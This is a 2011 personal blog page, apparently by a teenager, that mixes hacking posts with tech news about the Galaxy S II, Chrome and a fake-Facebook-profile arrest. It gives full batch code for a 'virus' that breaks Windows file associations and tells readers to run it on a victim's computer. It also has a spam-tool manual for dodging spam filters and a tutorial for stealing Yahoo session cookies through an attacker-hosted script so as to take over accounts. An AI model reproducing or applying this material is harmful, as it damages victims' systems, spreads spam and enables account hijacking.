Saturday, 30 July 2011

Extension change Virus

I Have enclosed a simple Extension replaceable batch virus “Ext_change” Source code.
1. Open up a Notepad and copy and paste the below code.
Title Ext_Change Virus
color a
Rem This Virus file replaces the actual file extensions with the given extensions
@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..

2. Save it with the extension .bat, and now you are ready to go….

3. Execute this on Victims computer to create havoc.
Its only you who is responsible for what you do with this…. 

we are not responsible for whatever you do with this… and it is only meant for educational means…
How it Works….
This Virus File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it…
It replaces all the text files [.txt] with the extension [.jpeg], and likewise….

Samsung Galaxy S II To Be Launched In White

Samsung Galaxy S II To Be Launched In White

The white GS2 will initially make way to the UK.

The Samsung Galaxy S II has been widely successful wherever it has been launched. To improve on the current sales, the company will introduce a new white variant of the "Superphone" starting from the United Kingdom. The white variant has been put up for pre-order by UK-based retailer Clove, which means that other countries are likely to follow soon. With the black GS2 doing so well in the market, there is no doubt that the new white version could do considerable damage to other companies as well. This new variant is said to hit Clove UK on August 15. Samsung did something similar by launching a white variant of the GS2's predecessor, the Galaxy S.

The white GS2 will have the entire back panel coloured in striking white, while the front portion including the lone button could be posing entirely in white as well. According to the source, even the chassis of the device could be white. The white GS2 will come in a 16 GB version only for now. It is up for pre-order on the retailer's website for about " 492 (Rs 35,000 approx) which shows that the white variant is not going to be easy on your wallet. It is unfortunate though that there is no official image of the white GS2. That being said, Samsung could treat our eyes to the official photos sooner than we think.

The GS2 has blown away customers by its performance and the slim form factor, not to mention the super lightweight body. It seems like Samsung wants to spice things up with a variant to choose from. There is no updated image of the white version, but it should look pretty slick. Rest of the specifications will remain the same for the GS2 as you would expect. We wouldn't be surprised if the white GS2 would be priced heftily in the Indian subcontinent given the demand factor. The white variant should hit Asia by about next month or the month following that. It shouldn't make a difference to the fans though, since it's only a different colour and will not be offering anything new in terms of functionality.

Dark Mailer- Fast Bulk Email Software

Dark Mailer is a super fast bulk email software that sends out at speeds greater than 50,000 emails per hour on a dedicated mailing server. Dark Mailer has the capability to use Proxies and Relays and also to send directly. Some of the features include:

  • Anonymous Mailing using Proxies
  • Message Randomization to bypass Spam Filters
  • Speeds over 500K emails per hour on Turbo Mode
  • Up to 1000 Threads

Dark Mailer Manual :

To open the Dark Mailer is need to double click on the icon called "dm" on the desktop. Below is the icon should look in the Desktop folder or in the folder where you have installed the DarkMailer
After opening the program main window will appear the same,as follows:
In this window, the first thing we have to do is simply touch the LOAD button located above the left to load the text file that contains advertising. Below is the main window, with the button highlighted to be opened for identification purposes.
Once that window is opened, another search window will appear, so to put the path where the file is ad text.It is recommended to save the HTML file in the same folder where is installed DarkMailer, in this case "Desktop" in
Below is a figure which is clearly the type of window that is to appear.
This will locate the file you need.
Where it says "Search" appears as the default desktop, then you must select the path to find the correct file.
Once the display shows the correct file, double-click it and automatically be charged, being as follows.
The image shown above is as it should be. The message is loaded in sight "HTML Code" does not mean that customers receive the message that way, you will receive properly.
In the "From Name", "From Email" and "Subject" should not change anything, it automatically for this product have been charged with 20 different names, 20 different Emails and between 5 and 10 different Subjects. The program is set to every 30 mails that are sent to change the sender, email and the subject, making them rotate all contained in each shipment, to prevent servers sending spam detected.
Now, we load the email lists.
For that, we must go to the tab that is next to the one we are looking at right now is "message" ... the next tab is "emails" here we see how to load the txt list containing all emails from potential clients
The image we're seeing just shows the top of the window. In this, there are the tabs to configure all the shipping. In that image is highlighted with red circles show the tab "emails" which we clicking to visualize.
Once done, you should see the following window:
Well, I will explain a bit what we see in this window.
In this rectangle that appears empty and is labeled "this list is empty" there will appear all the lists to be loaded for shipping.
Then we have 3 lines down under the title of "Log Files" here means that configure what we want the program saved in the logs.
We can configure to save a file of emails sent, failed and non-existent.

We will configure the logs to start. NOTE: only be configured once, no need to configure these logs every time you close and open the program.
The first thing to touch is the yellow icon that appears on the right side of the window, as is shown below:
Once you touch this button opens a window style that was opened when Load the HTML file. In this window just what you need to do is locate the folder where we have the DarkMailer (desktop will be the default folder), once
found, the open and automatically displays all the files inside. Without touching nothing but enter into any other
folder, touch the button and ready OPEN (see figure below)
Once this process appear the path to this file on the line provided. To place the other two logs (Failed and Bad) is necessary to do the same procedure with this.
Ready, once finished loading the logs, we will proceed to load the files containing the mails, called by us "email list", which contain 30 000 addresses each.
To download these files, we must go on the rectangle that is labeled "this list is empty" and click the right mouse button. This will display a list with three options, of which we select "Add", as shown in the picture below.
Pressing this option will open a search window classic, we request you give the path to the files you wish to add to our "mailing list." This window is similar to that found when loading the HTML file and Log files seen before.
It is very important that all txt files sent to them in the file "Softw - DarkMailer.Zip" Be original unzipped folder within the program, to avoid confusion. That is if the program folder on the desktop, and this folder is called "DarkMailer" then we must create within the folder "DarkMailer" a subfolder called "lists", and unzip these files there. The folder "lists" would be replaced the following to the famous "Data" folder of AMS used in previous shipments. In short, it should be thus Desktop / DarkMailer / Lists Then in the search dialog of the wizard will guide txt files to this folder, to show us all the files we have available.
Note: While all files included, you should charge for a six lists, to avoid confusion and to better control the flow of emails. After showing us all, make the first double-click to load. When you repeat the process over five times more to be loaded for 6 to start the shipping lists, being as follows.
Keep in mind that in the left side of each list in each row, there is a check box that appears primed each time you add a list. If this box is uncheck, and we have not yet processed a shipment, we checked, otherwise the program will not let us continue.

In summary, for here we have loaded the text to send, we will automatically set the fields "From Name", "From Email" and "Subject", we have also posted the names and path to save the logs of each shipment and finally we loaded six lists we send.

Once done, the rest of the flaps should not be playing, because the mail server, the proxies and settings, will be changed from the central machine and send them to a file, that should only be replaced at no must now change any option in that case you may not leave the shipping correctly, so I recommend "Do not touch anything that is not specified in the manual" 

Before starting with the shipping, they will apply for performing only time a configuration change. This change is going to do as I said for the only time recently, and will allow us to automatically detect the DNS of the connection you are using and also configure an option that will allow us to pause shipments if the connection is dropped or disconnected, and take them up again if the same program achieved after several attempts to reconnect. For this, they must be facing the computer and ask assistance, MSN or by PHONE.

Now if we are in a position to begin shipments. As these items are sent by remote servers and Proxies may note several flaws, the most likely first start and has 2000 deliveries and 0 errors, numbers and then change to normal, remaining at approximately 80% of incorrect shipments. 

If you stay here until the all clear, then we will touch the send button as shown in the figure below. (The button is in the top left of the window progrm).
Pressing this button will start sending emails, starting with the first list marked the end, come to the second and so on until end all.
Once complete, touch the OK button and repeat the charging process of emails, deleting first those already  harged and sent. To do so, touch the right mouse button and select "Clear List", after that, the list is rejected, and the rectangle with the words "this list is empty" as before. Redo all the steps of loading lists and sending emails. 
Below is a picture of how emails are processed with this program.

Teen arrested for fake Facebook account of Chief Minister

A teenage boy was arrested by the police from Indore district for allegedly creating a fake profile of Madhya Pradesh Chief Minister Shivraj Singh Chouhan on popular social networking site Facebook and uploading cartoons and controversial photos on it.

The matter came to light sometime back and Chouhan had himself filed a complaint in this regard with the police for investigating the matter, Bhopal's Senior Superintendent of Police (SSP), Adarsh Katiyar said.

A police team had then contacted Facebook's India office on the issue, but when they did not reveal any information citing privacy policies of the social networking site, Bhopal police sought the help of Interpol following which the site's head office informed that it was created at an Indore-based cyber cafe situated in the Malharganj area of the city.

Police then zeroed on the cafe and arrested the teenager, a student of Class XII yesterday, he said. Since the boy was a minor, his name is not being revealed. The boy was brought to Bhopal and a case under various sections of the cyber laws was registered against him, Katiyar said.

Police sources said some of the photographs and cartoons on the profile are communal in nature while others make fun of Prime Minister and senior Congress leaders.

Google Chrome 12.0.742.122

Google Chrome 12.0.742.122

Google Chrome is a browser that combines a minimal design with sophisticated technology to make the web faster, safer, and easier. It has one box for everything: Type in the address bar and get suggestions for both search and web pages. Will give you thumbnails of your top sites; Access your favorite pages instantly with lightning speed from any new tab. Google Chrome is an open source web browser developed by Google. Its software architecture was engineered from scratch (using components from other open source software including WebKit and Mozilla Firefox) to cater for the changing needs of users and acknowledging that today most web sites aren't web pages but web applications. Design goals include stability, speed, security and a clean, simple and efficient user interface.

21.3 MB  


Windows (All) 


Hack Yahoo accounts with Session IDs or session cookies

What are session IDs or session cookies ? 

Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just login to Type in browser javascript:alert(document.cookie);
You would get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .
Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies.

An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim  clicks 'Sign out' , session gets  destroyed and attacker too also gets signed out. 
But in case of yahoo, its not the same.The attacker doesnt get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs  by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the  yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Requirement: Download some files from here

Tutorial to steal session IDs :-
1. Sign Up for an account at any free webhosting site. I have chosen  Login to your account and go to file manager. Upload the four files that you have just downloaded.
    Make a new directory 'cookies' here.

3. Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory '
He would again redirected to his yahoo account.

4. Open the hacked.php . The password is 'reverse'.

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

About Shubham..

My photo
Jamshedpur, Jharkhand, India
A cant-live-without-technology type of teen...Blogger by hobby...